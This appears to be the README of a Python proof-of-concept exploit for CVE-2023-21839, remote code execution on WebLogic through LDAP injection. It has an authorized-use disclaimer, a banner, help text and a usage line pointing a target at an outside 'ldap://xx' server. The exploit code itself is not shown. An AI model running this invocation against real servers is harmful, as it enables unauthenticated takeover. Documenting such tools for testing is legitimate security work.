
Python proof-of-concept exploit for CVE-2023-21839 targeting WebLogic servers via LDAP injection for unauthenticated remote code execution.
Translated the GO version of @4ra1n into Python based on specific needs, thanks again!
This program should only be used for authorized security testing and research purposes. Users should comply with the Cybersecurity Law and use it reasonably.
Any illegal attacks or other illegal behaviors caused by the user using this tool are not related to the author.
vulhub reproduction: Link
___ __ ____ ___ ____ _____ ____ _ ___ _____ ___
/ __\/\ /\/__\ |___ \ / _ \___ \|___ / |___ \/ |( _ )___ // _ \
/ / \ \ / /_\_____ __) | | | |__) | |_ \ _____ __) | |/ _ \ |_ \ (_) |
/ /___ \ \ V //_|_____/ __/| |_| / __/ ___) |_____/ __/| | (_) |__) \__, |
\____/ \_/\__/ |_____|\___/_____|____/ |_____|_|\___/____/ /_/
usage: CVE-2023-21839.py [-h] [-ip] [-p] [-l]
Please enter parameters
optional arguments:
-h, --help show this help message and exit
-ip , --ip target ip
-p , --port target port
-l , --ldap ldap
python3 CVE-2023-21839.py -ip xx -p xx -l ldap://xx
